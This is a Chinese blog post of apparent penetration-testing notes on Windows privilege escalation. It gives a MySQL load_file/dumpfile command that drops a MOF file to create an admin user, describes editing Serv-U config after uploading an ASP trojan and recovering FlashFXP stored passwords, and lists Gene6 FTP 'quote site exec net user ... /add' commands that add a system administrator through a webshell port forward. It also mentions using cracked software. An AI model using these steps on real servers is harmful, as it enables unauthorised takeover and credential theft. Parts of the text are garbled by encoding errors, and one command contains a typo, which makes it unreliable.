2020-05-08 MOF漏洞提權(quán)、mssql提權(quán)、serv-u、Gene6

一、MOF漏洞提權(quán)

當(dāng)可以遠(yuǎn)程連接時(shí),利用工具提權(quán),新建用戶后,不會(huì)馬上出現(xiàn),稍等幾十秒后就出現(xiàn)新建的用戶。

當(dāng)不能遠(yuǎn)程連接時(shí),或不想開啟遠(yuǎn)程連接時(shí),我們找一個(gè)可寫目錄,上傳一個(gè)mof?的文件

首先將文件上傳在wmpub文件中

上傳

然后進(jìn)入數(shù)據(jù)庫(kù)管理,打開dvwa數(shù)據(jù)庫(kù),

進(jìn)入數(shù)據(jù)庫(kù)管理

執(zhí)行下面這段命令
select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';

執(zhí)行命令

執(zhí)行后,等待一段時(shí)間,查看是否新建了用戶admin

新建admin用戶

注意新建的帳號(hào)每隔5分鐘就會(huì)新建帳號(hào),刪除帳號(hào)的辦法參考下面這個(gè)連接地址。

http://www.myhack58.com/Article/html/3/8/2013/38264.htm

二、Mssql提權(quán)

mssql提權(quán)主要分為弱口令與溢出兩類提權(quán)。目前主要通過(guò)弱口令連接直接提權(quán),溢出類Mssql數(shù)據(jù)庫(kù)幾乎很少見。

這個(gè)數(shù)據(jù)庫(kù)默認(rèn)是可以遠(yuǎn)程鏈接的,可以直接用工具連接

三、serv-u本地提權(quán)及帶配置文件修改提權(quán)

安裝serv_u

暫時(shí)不要啟用

把勾取了

安裝補(bǔ)丁,將補(bǔ)丁放在安裝目錄

漢化,因?yàn)檫@是收費(fèi)的,英文版,我們這是破解版,也是安裝在之前的目錄

然后上傳一個(gè)asp木馬,放在搭建的asp網(wǎng)站

1、通過(guò)修改配置文件提權(quán)

首先找配置文件

修改配置文件,最后提交,成功添加一個(gè)新用戶,有權(quán)限的系統(tǒng)管理員

修改文件

找到安裝目錄,將文件添加一個(gè)有修改權(quán)限

成功

成功添加系統(tǒng)管理員

成功

密碼用cmd5解密,=后面兩位不用管,直接解密后面就ok

密碼cmd5解密

成功添加用戶后,我們可以通過(guò)工具FlashFXP進(jìn)行連接

也可以用cmd.exe連接

cmd.exe連接

2、無(wú)修改配置文件權(quán)限提權(quán)

使用大馬的servu提權(quán)

3、FlashFXP獲取賬號(hào)密碼

下載quick.dat、sites.dat、stats.dat這三個(gè)文件進(jìn)行本地替換,然后用星號(hào)查看器查看,就可以獲取登錄密碼

四、Gene6

安裝時(shí)除了安全、拒絕,其它權(quán)限全給。

?? Gene6 FTP默認(rèn)安裝路徑是C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini其中Remote.ini是主配置文件,管理員登錄的ip、端口和密碼都存儲(chǔ)在這。但Gene6管理員帳號(hào)只充許本地登錄。對(duì)于滲透測(cè)試人員來(lái)講只需要通過(guò)Webshell轉(zhuǎn)發(fā)端口就可以進(jìn)行遠(yuǎn)程連接。

通過(guò)webshell上傳lcx.exe 把端口轉(zhuǎn)發(fā),如:lcx.exe –tran600127.0.0.1 8021? 接通過(guò)另外一臺(tái)機(jī)器安裝一個(gè)gene6遠(yuǎn)程連接600端口創(chuàng)建一個(gè)域再創(chuàng)建一個(gè)有權(quán)限的帳號(hào),注意Gene6可單獨(dú)定義SITE命令調(diào)用執(zhí)行文件,通過(guò)quote site exec 執(zhí)行就行

命令:

在獲得服務(wù)器FTP管理員后可以用quote site exec命令來(lái)添加系統(tǒng)管理員,cmd下操作方法如下:

quote site exec net user 用戶名 密碼 /add 添加一個(gè)用戶

quote site exec net localhost administrators 用戶名 /add 把用戶添加到系統(tǒng)管理員組

quote site exec tskill PID 在 Windows 2003 中通過(guò) PID 關(guān)閉進(jìn)程

quote site exec tskill notepad 在 Windows 2003 中通過(guò)名稱關(guān)閉同類的進(jìn)程

quote site exec net stop iisadmin 停止 iis 服務(wù)

quote site exec net start iisadmin 啟動(dòng) iis 服務(wù)

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容